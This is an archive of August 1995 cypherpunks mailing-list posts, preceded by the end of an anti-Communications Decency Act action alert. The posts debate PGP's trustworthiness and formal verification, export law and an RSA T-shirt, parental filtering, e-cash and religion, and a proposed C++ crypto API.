        S:Rep. Snark supports HR1978.
        Y:Thank you!

   Take the response you get and mail it to vtw@vtw.org.  We'll be
   totalling up the responses and counting votes.  Send it to us
   with the subject line of "house call".

        $ Mail vtw@vtw.org
        Subject: house call
        I live in Ohio and I called Rep Snark.  Snark's staffer
        said he favors HR1978 too!
        .
        Mail sent...
        $

   SAMPLE FAX 
        Dear Representative Snark,

        As your constituent I'd like to urge Rep Snark to oppose
        Internet censorship legislation such as the Exon/Coats
        Communications Decency Act and support parental control bills
        such as the Cox/Wyden Internet Freedom and Family Empowerment
        Act - HR1978.

        Sincerely,
        
        <your address>
        
3. Ask your Internet Service Provider or Sysop to put the following
   message into their "message of the day".  We also encourage you
   to forward the following short announcement to relevant mailing
   lists where a copy of this alert would be too long for the list.

        8/1/95: The Communications Decency Act (CDA) will be voted on
        by the House of Representatives this week.  IT IS CRUCIAL THAT
        YOU CALL YOUR REPRESENTATIVE NOW.  To get a copy of the alert,
        send mail to vtw@vtw.org with "send alert" in the subject line,
        gopher -p 1/vtw/exon/alert gopher.panix.com, or
        URL:gopher://gopher.panix.com:70/00/vtw/exon/alert

4. Forward a copy of this alert to your friends until the "freshness
   date" above.  THIS IS CRUCIAL.  WE NEED TO GENERATE CALLS OF SUPPORT
   OR THE COMMUNICATIONS DECENCY ACT WILL BECOME LAW.

5. Congratulate yourself!  You've done your part to save cyberspace.

________________________________________________________________________

HOW TO FIND YOUR REPRESENTATIVE'S PHONE AND FAX NUMBER:

1. If you don't remember your representative's phone number, send email 
to
 
     reps@cdt.org

   You will automatically receive a list of all 435 members of the 
House of
   Representatives with phone and fax numbers.

2. OR, call the Capitol Switchboard (+1.202.225.3121) and ask to be 
   connected to your Rep's office. If you don't remember who
   your Rep. is, the operator can tell you when provided with your 
zipcode.

________________________________________________________________________

WHAT IS COX/WYDEN?

Cox/Wyden (HR1978) is legislation intended to prevent the Federal
Communications Commission (FCC) from imposing content regulations on
cyberspace and encourage private sector development and deployment of
parental control technologies.

Throughout HR1978's history, civil liberties advocates from ACLU, CDT,
EPIC & PFAW have examined the bill and recommended modifications to
ensure that the bill does not negatively impact your privacy or civil
liberties.  Although several questions still remain, Representatives
Cox and Wyden are committed to addressing these concerns.  As the
legislation moves to the House/Senate conference committee, civil
liberties advocates will continue to submit changes to the
Representatives' staffers throughout the conference process where the
House bill and the Senate-approved Communications Decency Act are
reconciled.

________________________________________________________________________

CHRONOLOGY OF THE COMMUNICATIONS DECENCY ACT

House vote to occur before Friday August 4, 1995.

Jun 30, '95     Cox and Wyden introduce the "Internet Freedom and 
Family
                Empowerment Act" (HR 1978) as an alternative to the 
CDA.
Jun 21, '95     Several prominent House members publicly announce their
                opposition to the CDA, including Rep. Newt Gingrich 
(R-GA),
                Rep. Chris Cox (R-CA), and Rep. Ron Wyden (D-OR).
Jun 14, '95     The Senate passes the CDA as attached to the Telecomm
                reform bill (S 652) by a vote of 84-16.  The Leahy bill
                (S 714) is not passed.
May 24, '95     The House Telecomm Reform bill (HR 1555) leaves 
committee
                in the House with the Leahy alternative attached to it,
                thanks to Rep. Ron Klink of (D-PA).  The Communications
                Decency Act is not attached to it.
Apr  7, '95     Sen. Leahy (D-VT) introduces S.714, an alternative to
                the Exon/Gorton bill, which commissions the Dept. of
                Justice to study the problem to see if additional 
legislation
                (such as the CDA) is necessary.
Mar 23, '95     S314 amended and attached to the telecommunications 
reform
                bill by Sen. Gorton (R-WA).  Language provides some 
provider
                protection, but continues to infringe upon email 
privacy
                and free speech.
Feb 21, '95     HR1004 referred to the House Commerce and Judiciary 
committees
Feb 21, '95     HR1004 introduced by Rep. Johnson (D-SD)
Feb  1, '95     S314 referred to the Senate Commerce committee
Feb  1, '95     S314 introduced by Sen. Exon (D-NE) and Gorton (R-WA).

________________________________________________________________________

FOR MORE INFORMATION

Web Sites
        URL:http://www.panix.com/vtw/exon/
        URL:http://epic.org/
        URL:http://www.eff.org/pub/Alerts/
        URL:http://www.cdt.org/cda.html
        URL:http://outpost.callnet.com/outpost.html

FTP Archives 
        
URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech/00-INDEX.FREESPEECH
        URL:ftp://ftp.eff.org/pub/Alerts/

Gopher Archives:
        URL:gopher://gopher.panix.com/11/vtw/exon
        URL:gopher://gopher.eff.org/11/Alerts

Email:
        vtw@vtw.org (put "send alert" in the subject line for the 
latest
                alert, or "send cdafaq" for the CDA FAQ)
        cda-info@cdt.org (General CDA information)
        cda-stat@cdt.org (Current status of the CDA)

________________________________________________________________________

LIST OF PARTICIPATING ORGANIZATIONS

In order to use the net more effectively, several organizations have
joined forces on a single Congressional net campaign to stop the
Communications Decency Act.


American Communication Association * American Council for the Arts *
Arts & Technology Society * Association of Alternative Newsweeklies *
biancaTroll productions * Californians Against Censorship Together *
Center For Democracy And Technology * Centre for Democratic
Communications * Center for Public Representation * Citizen's Voice -
New Zealand * Cloud 9 Internet *Computer Communicators Association *
Computel Network Services * Computer Professionals for Social
Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer
Lounge * Dutch Digital Citizens' Movement * ECHO Communications Group,
Inc. * Electronic Frontier Canada * Electronic Frontier Foundation *
Electronic Frontier Foundation - Austin * Electronic Frontiers
Australia * Electronic Frontiers Houston * Electronic Frontiers New
Hampshire * Electronic Privacy Information Center * Feminists For Free
Expression * First Amendment Teach-In * Florida Coalition Against
Censorship * FranceCom, Inc. Web Advertising Services * Friendly
Anti-Censorship Taskforce for Students * Hands Off!  The Net * Human
Rights Watch * Inland Book Company * Inner Circle Technologies, Inc. *
Inst. for Global Communications * Internet On-Ramp, Inc. * Internet
Users Consortium * Joint Artists' and Music Promotions Political Action
Committee * The Libertarian Party * Marijuana Policy Project *
Metropolitan Data Networks Ltd. * MindVox * MN Grassroots Party *
National Bicycle Greenway * National Campaign for Freedom of Expression
* National Coalition Against Censorship * National Gay and Lesbian Task
Force * National Public Telecomputing Network * National Writers Union
* Oregon Coast RISC * Panix Public Access Internet * People for the
American Way * Republican Liberty Caucus * Rock Out Censorship *
Society for Electronic Access * The Thing International BBS Network *
The WELL * Voters Telecommunications Watch

(Note: All 'Electronic Frontier' organizations are independent 
entities,
 not EFF chapters or divisions.)
________________________________________________________________________

        End Alert
=======================================================================












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 2 Aug 95 06:51:48 PDT
To: cypherpunks@toad.com
Subject: HEY_now
Message-ID: <199508021351.JAA08303@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-02-95. NYPaper:


   "Pattern Emerges In Bomber's Tract: F.B.I. Says Attacker
   Stayed Close to a Few Campuses."

      In what was described as an important advance in the
      hunt for an elusive serial bomber, the Federal Bureau of
      Investigation said yesterday that it had traced a
      years-long pattern of academic involvement that took the
      self-described anarchist from the Chicago area to Salt
      Lake City to Berkeley, Calif. By matching his 17-year
      record of carnage against an analysis of a densely
      argued 35,000-word tract he sent to The New York Times
      in June, Government officials say they have concluded
      that the bomber is a student of the history of science
      who may have taken classes at or hovered around major
      university campuses from the late 1970's to the mid-
      1980's.                                        FCU_stu


   "Excerpts From Manuscript Linked to Suspect in 17-Year
   Series of Bombings."

      Role of Scientists: The system HAS TO force people to
      behave in ways that are increasingly remote from the
      natural pattern of human behavior. For example, the
      system needs scientists, mathematicians and engineers.
      It can't function without them. So heavy pressure is put
      on children to excel in these fields.          FCX_txt



   Twofer: HEY_now











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Wed, 2 Aug 95 07:13:01 PDT
To: cypherpunks@toad.com (Good Guys)
Subject: Consumer Report: RSA T-Shirt
Message-ID: <199508021411.KAA05924@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


I got my RSA tee-shirt the other day..

It came promptly and both of the shirts I ordered came. It
was oddly shipped in a near see-through pouch.

I'm happy over all with the shirt, the quality of the printing, and
the construction of the Tee (all cotton, name brand tee)..

I have only one complaint. THat is the "machine readable" rsa barcodes.

TO my eye the printing job there is rather poor. I doubt it is
machine readable (althought I don't have a 128 barcode reader to
try it out with)..

I'm disappointed as I doubt that the 4 line RSA code is NOT exportable
since text books have been allowed previously to be exported. Machine
readable materials have been called into question. My thoughts are
that if it is not machine readable the shirt is much more a novelity
then an munition (which is sorta why I bought it to begin with.. to be
fair..)..

Of course I hoped to be the first one on my block to own one. But when
I went into the drug store the clerk asked me where I got it, noting
someone else was just in there wearing one...

/hawk
-- 
                Harry Hawk
                Manager of Computer Services
                Warwick Baker & Fiore
                212 941 4438
                habs@warwick.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 2 Aug 95 07:43:08 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Provably Correct Crypto
Message-ID: <9508021442.AA25910@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Those interested in this discussion of verification of PGP etc. might also
find it worth reading some recent traffic on the firewalls list, regarding
the viability of "trusted systems" and formal evaluation methods. Look for
messages from Marcus Ranum (ex-TIS), Ray Kaplan, and some others in the
past few digests (e.g. #458 and #459, and a few prior ones). You can find them
in ftp://ftp.greatcircle.com/pub/firewalls/digest/ with filenames like
v04.n458.Z, v04.n459.Z, etc. (Only digests through #457 are there now, but I'm
sure the latter ones will appear soon.) Use majordomo@greatcircle.com if you
want to subscribe to firewalls or firewalls-digest.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Tue, 1 Aug 95 19:53:49 PDT
To: Richard Martin <rmartin@alias.com>
Subject: Re: Stopped at the boarder
In-Reply-To: <9508011001.ZM17072@glacius.alias.com>
Message-ID: <Pine.LNX.3.91.950802104951.15600B-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Aug 1995, Richard Martin wrote:

> Until a few years ago, carrying software across the border from the states
> to Canada, one would only pay duty on the value of the media. Canadian
> Customs regulations did not recognise any value in the information
> contained on the floppies. I haven't actively exported/imported software
> in this manner recently (well, I carried 2.6ui to Mobile and back without
> realising it (or, indeed, ever putting it in a drive) and so broke ITAR)
> so I'm not sure how things stand currently.
> 
> I think they might actually have been convinced of the value of software.
> [Department of External Affairs and International Trade has been, as noted
> earlier. Danger of software, at least.]


As far as I know, under current GATT regulations software is not
considered a commodity, and therefore its import does not attract customs
duties. However, I'm not sure about the actual behaviour of the US
customs; from recent cases I can confirm that in the European Union and
South Africa that rule is respected. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Sheppard <Matthew.Sheppard@Comp.VUW.AC.NZ>
Date: Tue, 1 Aug 95 15:59:57 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Provably Correct Crypto?
In-Reply-To: <9508011911.AA11465@all.net>
Message-ID: <199508012259.KAA16027@bats.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


The shadowy figure took form and announced "I am Dr. Frederick B. Cohen and I s
ay ...

[ lots of purely subjective arguments that frequent alt.security.pgp ]

Frederick can you please tell me why I should belive thttpd is secure.
I don't accept the ability to compile it myself as evidence and I
don't accept a summary of that source written in english prose on the
basis that it has no hard link what so ever to the source.  It was
also written by the authors of thttpd.

You should find this argument hauntingly familiar.

You state that crypto should be poved correct and suggest a technique
otherwise known as formal specification.  I agree, pgp should have
been written in Z-specs.  If you take a course in formal specification
you will soon see the intractability of the technique wrt large
systems.

I'm sorry, the english prose your team writes holds no extra formal
credibility over trust.  It demonstrates more study - but has not
proven security.

If you want prople on this list to repeat after you "I cannot be
certain there is no compromising bugs or backdoors in X" Then I will
go out on a limb and say everyone here will agree if system X is
sufficiently large.

p.s X = thttpd

--
                                          <URL:http://www.comp.vuw.ac.nz/~matt>
                 |~    |~
             |~ o|    o|
       ('<  o| 
      ,',)   
     ''<<    
     ---""---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 2 Aug 95 08:31:14 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: anonymity review in law journal
In-Reply-To: <199508020334.UAA09787@netcom15.netcom.com>
Message-ID: <9508021530.AA28462@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri writes:
> Hi everyone, someone tipped me off to a law review article by 
> Anne Branscomb entitled Anonymity, Autonomy, and Accountability: 
> Challenges to the First Amendment in Cyberspaces  104 Yale L F 1639.

I expect this is the Anne Wells Branscomb who reviewed the Rimm job for
the Georgetown Law Journal. According to
http://catalog.com/columbia/homepage/ftr/995.html, she `called the study's
methodology "academically rigorous."' She is a professor at the GWU law 
school. Alas, neither the GWU law school nor the Yale law school seems to
have any measurable presence on the WWW. A Lycos search turned up a footnote
pointing to an article she wrote for Scientific American:

Branscomb, A. W.: Common law for the electronic frontier.
   In Scientific American, September 1991, pp. 154-158. 

A paper by Norderhaug and Oberding on "Designing a Web of Intellectual
Property" at http://www.ifi.uio.no/~terjen/pub/webip/950220.html that
cites the SciAm piece mentions that:

	Branscomb [bra91] reminds us that the rigors of the market
	economy are such that it is not a viable economic policy to give
	away the results of intellectual labor without a fair and equitable
	compensation. 

Thus I would be rather surprised if the anonymity/autonomy/accountability
paper turned out to be notably sympathetic to anonymity. That would make it
all the more interesting to see....

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A.Back@exeter.ac.uk
Date: Wed, 2 Aug 95 03:36:56 PDT
To: fc@all.net (Fred Cohen)
Subject: some discussion of rannos in PGP (was: of a hole in PGP)
Message-ID: <17441.199508021035@olib>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Fred Cohen <fc@all.net> writes on cpunks:
: PGP is a product that is specifically disliked by the powers that be
: because it provides free access to strong cryptography which is against
: the public policy of the US government.  That means that people in that
: same said government likely feel it is their duty to make certain that
: they can still read PGP mail.

Certainly granted!  Hence persecution of Phil Z.

A bit difficult to achieve in the presence of available source code, I
(and many others) are using PGP compiled by themselves.  That doesn't
prove there are no subtle back-doors but it rules out unsophisticated
backdoors in distributed executables.  (Even such things could be
checked if someone got suspicious, things can be reverse engineered).

Now to the question of what can be done practically to help further
validate PGPs authenticity, and freeness from back-doors.

The way I see it the only attack which you could reasonably expect to
pull off in terms of being subtle enough to hope to get away with
given full access to source is the random number generator.

The code which actually generates the random primes, and converts them
to PGP output format is reasonably short and well defined.  Wouldn't
take long to single step that and watch that nothing happened on the
way out to file.

Encryption is a similarly simple operation, M ^ e % n you could easily
check that manually (with a certain small piece of perl even).  Same
for generation of IDEA keys.

I don't really feel qualified to comment properly on the random number
generation, but to me (I looked at the source in fair detail) it looks
good.

I mean there is real entropy being generated (timing key strokes
against a high speed clock on PCs lower on UNIX systems typically)
and the stirring operation looks good, MD5 + XOR on key.

Presuming that the MD5 implementation is correct?  Seems a pretty good
likelihood to be, it's been given enough real world tests that you
could do a very nice probablistic statistical confidence test on it.
Which would easily say that it was correct to some huge degree of
certainty.

The legitimacy of using a high frequency clock to time intervals
between key strokes, seems a very good way of generating random
numbers.  I mean there is most definately *some* entropy being
generated, PGP makes reasonably conservative estimates of the amount
of entropy generated, and stirs the whole number in (not just the
expected entropy).

I'm not saying your comments aren't useful; they are, and analysis and
critique of the random number generation in particular is very
important.  Indeed given the sheer cost of factoring a 2048 bit RSA
modulus, or of brute forcing a 128bit IDEA key, it is indeed a
pertinent question as to whether any kind of brute force attack could
be generated on the random number generation, which could be slighly
cheaper than either of these.  128bits is a lot to play with.

To me it looks good, but then I'm not a cryptographer, and also there
is the kind of "NP problem aspect" to it all in that for reasonably
complex code it will not be apparent whether a proof is possible with
out looking at the specifics.

Still I think some analysis of the random number generation code would
be useful work.  I'm not expecting to see a flaw, but doesn't mean it
shouldn't be entered into with an open mind.

I think it does not fall in the same league as the apparent difficulty
of having a secure sendmail (you said a compromising couple of bugs
seem to get found a couple of times a year), for at least two reasons,
one is that with sendmail the code being examined must take input from
Charlie who is trying to mess the system up.  So a deliberate attempt
to foul the works, examining the source, looking for any kind of
subtle weakness, or weird combination of inputs (which would almost
certainly never occur by accident during normal usage) which could
cause it to compromise security.  For PGP for the section we are
talking about (key generation) the only input comes from *you*, the
person who is presumably trying to obtain security, not trying to
generate a weak key through some tortuous input string.  So things
like the stack over flow with carefully crafted machine code for the
particular architecture which was exploited with finger in the fave
old example of the worm of yore, is not the kind of attack you need to
be worried about (IMO).

The second aspect in which analysing PGPs ran no generation, is
different to sendmail or http type problems is that what PGP is doing
with it's random no generation is well defined, contained in few
lines of code, and only really relying on a couple of assertions:

	1) MD5 is itself not inherently flawed
	2) the MD5 implementation is correct
	3) key stroke timings are a source of a safely conservatively
	   estimatable amount of entropy
	4) the key generation method does not narrow the search space
	5) there are no other compromising bugs between key generation
	   of the key and it being written to the keyring

1) Heh, not a lot you can do about that.  Is it or isn't it?  Time
will tell.

2) Seems pretty likely to me there are test strings which come with
the RFC implemenation, and it would be unbelievably unlikely that it
should produce the complete set of tests and yet somehow still be
flawed.  Given that there are _no_ branches in the algorithm (ie just
various permutations and bit twidlings based on the key info, which
get mangled into the digest.

3) Pretty good I think, especially on a PC, which has a higher speed
timer.  Some entropy is surely generated, and with safe entropy
estimation, and cryptographically secure stirring, it sounds pretty
good to me.

4) For RSA keys, I don't think so, unless you believe that strong
primes will agains become important.  For current factoring algorithms
strong primes are just as hard to factor as a completely randomly
generated prime, except for certain primes which are in any have an
infinitesimal chance of occurring.  For IDEA keys there is little
value added over a striaght ran no, as there are no special properties
which an IDEA key must have.

5) I would assert is relatively trivial to demonstrate, a couple of
hours with a debugger should demonstrate that.  You could do testing
more rigourously, test every branch, so that you have checked that the
outcome is that the key gets written to the keyfile, with various
options, not utterly fool proof of course, but pretty darn good given
the simplicity.

On the more philosophical side, with the idea that you can never be
sure that folks aren't NSA agents with hidden agendas etc, well you
can't be sure.

But the open source and sheer number of folks reading is the best
argument against this.  That means that at least some true blue
cpunks, "live free or die" types will read it in earnest, and examine
very carefully.

Another philosophical argument against PGP having any cleverly hidden
"back-doors" in the form of purposefully weakened ran-no generators or
what have you is that the NSA et all hate PGP with such vehemence.
Heh if they don't like it, it must be good :-)

And remember, say NO to key escrow :-)

(It's no good having an ultra carefully validated PGP if you go to
jail for being caught with a copy on your HD, welcome to the Land of
the Freeh, and all you know.  May happens sooner than expected, then
the only folks using crypto will be the "live free or die" folks, plus
of course the criminals who figure they have more to hide and would
get in more trouble for what they are really up to than for a
"possesion of crypto" charge.)

Adam

PS to any folks who may have sent me mail in the last couple of days,
note the temporary change of email addr to: A.Back@ex.ac.uk due to
local hw failure, similarly the same m/c was the WWW server, should
all return to normal in a couple of days.  (Talk about single point of
failure, all the X-terms booted off it too).

- --
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
- --rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
- -------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMB9U5ynIuJ1VakpnAQGLcgP/fNe2cBJKNJrKE3iHiFrHgUM4So/Q0nqg
GYgJu+gYZIlnQSv6JUXBDWFw/29n/ARN9oENjxmgAs6rTiE9bjPhD8IuftGaENsF
ou3v4Y04B/7UFG8sXx9Opdr0G6P+sHM7f+pdwkCW4rtWA1tclUigrkIF/+65Q0a4
iZN1c4Y23tk=
=35BY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Wed, 2 Aug 95 08:39:00 PDT
To: Matthew James Sheppard <Matthew.Sheppard@comp.vuw.ac.nz>
Subject: Re: Provably Correct Crypto?
In-Reply-To: <199508020255.OAA10557@bats.comp.vuw.ac.nz>
Message-ID: <199508021538.LAA08653@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Matthew James Sheppard writes:
> I stipulated I didn't want any such garbage, I specifically said
> english summaries are not acceptable and you bombard me with them.
> Yet you wont accept others opinion of PGP's security, which verbal or
> other wise, can only be an abstract summary.

Not long ago "Dr." Cohen was in a flame war with me (on bugtraq) in
which he claimed exactly the opposite of everything he's claiming here
-- that for enough money it was practical to actually prove the
security of an arbitrarily complex piece of code. Here, of course, he
claims the exact opposite.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Wed, 2 Aug 95 11:53:49 PDT
To: cypherpunks@toad.com
Subject: NYET--attempted formal specs (again)
In-Reply-To: <Pine.3.89.9508020848.A4868-0100000@maria.bga.com>
Message-ID: <199508021853.LAA10598@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Nathan Zook writes:
[ . . . ]
 > NYET-- Non-Youths Exhibit Temperance.
 >  
 > This is a rising, legitamate concern among parents that their children
 > have all-to-easy access to porn on the internet.  Last year, there
[ . . . ]
 >  
 > But none of these proposals can ultimately succeed.  Here I restate my
 > NYET proposal from last year for your consideration.  The system is of
 > necessity ISP-based.  Home-based systems are subject to attacks at
 > home.  Since many (most?) children are better with computers than
 > their parents, these attacks can be expected to succeed.
[ . . . ]
 >
 > The NYET-software runs as superuser on the ISP's machine.  All minor
 > accounts have a corresponding configuration file sitting in their
 > account owner's parent's directory, which is locked with read/write by
 > owner only flags.  The correspondence between minor and parent
 > accounts sits in a file owned by root and similiarly locked.
 >  
 > The parent sets the configuration file to permit and deny access to
 > various parts of the net.  Since it is unreasonable for the parent to
[ . . . ]

     Your solution fails against your specified threat.  Children who
are more software-proficient than their parents will, in many cases,
be able to access their parents' accounts and modify the configuration
file (or simply use the account to access the blocked areas).
Ultimately, all such systems are "home-based" if any accounts used by
members of the household have or can be granted access to the naughty
bits (tip o' the hat to M. Python).

     While your proposal is obviously marketable, given the success of
Prodigy and the prospects for SurfWatch, it does not appear to be
inherently more secure than schemes that utilize subscriber software.

Regards,

Patrick May

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMB/Jqe5Yg08fDKehAQH16gQAp78uOJX02xNz7/5XYPBcaRZRC8pCWx6K
oUdOxbGta/l1rKrRGWhJ7WLJy9iaopBcbr4YXNOMPL4Va91DEXkJ5rfJKXC+o7Mz
jA0wBujVu0DK+S0C49Ah3OoXxX6H0SorbuscvDF2IIw9aGLSezD49H4/GgWvhklo
Y1Gu5Tfok+Y=
=FsYi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Connie Sadler <SADLER_C@HOSP.STANFORD.EDU>
Date: Wed, 2 Aug 95 13:21:08 PDT
To: cypherpunks@toad.com
Subject: Re: Pat Robertson Fears E-cash?
Message-ID: <B367ZVWMJ1W8O*SADLER_C@SHS.STANFORD.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Subject: Re: Pat Robertson Fears E-cash?
Date: Wed, 2 Aug 1995 11:37:19 PDT
A1-type: DOCUMENT
Importance: normal

<
<On August 2, Peter Trei wrote:
<
<E-cash is a bit of a reach from this, but some of them (eg, 
<Robertson), extend the verses to cover all forms of trackable 
<transactions. I suspect that if someone could get him to realize the 
<privacy aspects of true anonymous ecash, he'd like it.
<
That's making a very large assumption that someone who thinks like
Pat Robertson is a rational human being...

Connie






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Wed, 2 Aug 95 10:42:06 PDT
To: cypherpunks@toad.com
Subject: Re: Pat Robertson Fears E-cash?
Message-ID: <9508021741.AA05602@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The relevant verses are in Revelations 13, where some of the actions
by which The Beast can be recognized are given. Among them are:

16 And he causeth all, both small and great, rich and poor, free and 
   bond, to receive a mark in their right hand, or in their foreheads: 
17 And that no man might buy or sell, save he that had the mark, or 
   the name of the beast, or the number of his name.

Millenialist Christians tend to regard this as a method by which 
the faithful will be shut out of the economy, since the pious will
refuse such a 'mark'.

E-cash is a bit of a reach from this, but some of them (eg, 
Robertson), extend the verses to cover all forms of trackable 
transactions. I suspect that if someone could get him to realize the 
privacy aspects of true anonymous ecash, he'd like it.

Just don't propose an implantable cryptographic token :-).



Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 2 Aug 95 11:01:32 PDT
To: cypherpunks@toad.com
Subject: Mierda
Message-ID: <199508021801.OAA03135@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New Yorker of July 31 writes on the indictment of six
   lawyers in Miami on drug-conspiracy charges:

      [Ex-Fed] Abbell continued to do legal work for the 
Rodriguez
      brothers, and in January, 1991, he hired an obscure
      Miami lawyer, Francisco Laguna, as a full-time
      associate. Laguna, who is in his thirties and was born
      in Colombia and speaks fluent Spanish, appears, from the
      indictment, to have been the most deeply immersed of all
      the lawyers in the day-to-day affairs of the Cali
      cartel. He maintained frequent contact with Miguel
      Rodriguez by public telephone. Unfortunately for Laguna,
      federal agents had obtained the code numbers of the
      debit cards he used to make his calls, and were able to
      intercept many of the conversations.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Wed, 2 Aug 95 12:01:07 PDT
To: "Harry S. Hawk" <habs@warwick.com>
Subject: Re: Consumer Report: RSA T-Shirt
In-Reply-To: <199508021411.KAA05924@cmyk.warwick.com>
Message-ID: <Pine.SUN.3.91.950802140354.5538A-100000@bambam>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Aug 1995, Harry S. Hawk wrote:

> 
> I have only one complaint. THat is the "machine readable" rsa barcodes.
> 
> TO my eye the printing job there is rather poor. I doubt it is
> machine readable (althought I don't have a 128 barcode reader to
> try it out with)..

We tried it and it does not read.

I am still very happy with the product 8-)


-Mike

**************************************************************************
*       Mike Bailey                     (hm)214-252-3915                 * 
*       AT&T Capital Corporation.       (wk)214-456-4510                 *
*       email bailey@computek.net       host bambam.computek.net         *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*                http://www.computek.net/public/bailey                   *
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ray Cromwell" <s5cromw@watson.ibm.com>
Date: Wed, 2 Aug 95 11:26:05 PDT
To: cypherpunks@toad.com
Subject: Object Oriented Crypto API
Message-ID: <9508021824.AA16891@play.watson.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain



C'punks,
  It seems to me that one of the reasons why crypto isn't being incorporated
into lots of applications is because there is no good general purpose
plug-n-play crypto-library.  I mean something that is so easy to use
that a Visual Basic programmer would understand it. I've had personal
experience with RSA's BSAFE library and I have to admit, it has
a better software architecture than any of the cypherpunk attempts.
It's highly portable and highly object oriented. Algorithms can be
dropped in and out easily. But it suffers from not being user
extensible, not having a variety of algorithms, and faking
object-orientation in C.  I think we can do better. (and we're not
as legally restricted as they are) We also need an architecture
that will facilitate collective work so that we do not duplicate
efforts.

  I recently checked out Crypto++ by Wei Dai. It's a real tour de
force of algorithms, and probably violates more patents in a single
piece of software than any in history. ;-) But it has some small design
quirks, and with a little bit of modification on the user interface
side (leveraging the code already written), I think it can be improved
by leaps and bounds. (IMHO)

Prelude
-------
  C++ will be our language of choice. A C-to-C++ API will be discussed
later. Note: in some parts, only pseudo-C++ is used, so don't expect this
to pass a C++ grammar.

The Design Goal
---------------
  The goal is to define an architecture permitting a simple API which
can perform all of the standard cryptographic operations (Encryption,
Signing, Key Management, etc) without strict dependency on any
algorithm, file format, or I/O mechanism. An application writer
should be able to incorporate cryptography into his application
without worrying about fileformats, key management, cryptographic
algorithms, or distribution. He should be able to seemlessly operate
on PEM messages, pgp files, etc without even knowing what the files
are. (I've looked at GSSAPI, it addresses different issues)

Here's a first-pass API:

Encrypt(EncryptionAlgorithm, EncryptionKey, PlainText, CipherText)
Decrypt(DecryptionAlgorithm, DecryptionKey, CipherText, PlainText)
Sign(SignatureAlgorithm, PrivateKey, PlainText, Signature)
Verify(VerifierAlgorithm, PublicKey, PlainText, Signature)
GetKey(KeyDomain, KeyId, Key)
PutKey(KeyDomain, KeyId, Key)
GenerateKey(EncryptionAlgorithm, RandomNumberGenerator, Key)

That's it, just 7 functions to perform almost all cryptographic
algorithms in the universe. P-Key and Symmetric systems aren't even
treated differently. A few more could be added to the API, but that's
the gist. Now let's look at how we will accomplish this abstraction.

Polymorphism is your friend
---------------------------

  While Crypto++ does have an object hierarchy, polymorphism is rarely
used. For instance, the Sign function signs raw data, not "Digests"
It does sign a Digest if you give it raw data that is a Digest, but
the point is, the function doesn't know. The idea of Signing should
be abstracted above and away from low-level representations and
the underlying cryptosystem itself.

(this philosophy of abstraction is drawn strongly from STL - the
standard template library which is a C++ working draft. It's a
great library design)

  Let's look at a single example: The Encrypt function.

  All encryption algorithms have a property in common, whether it is
a public key system, a symmetric block cipher, or a stream cipher: the
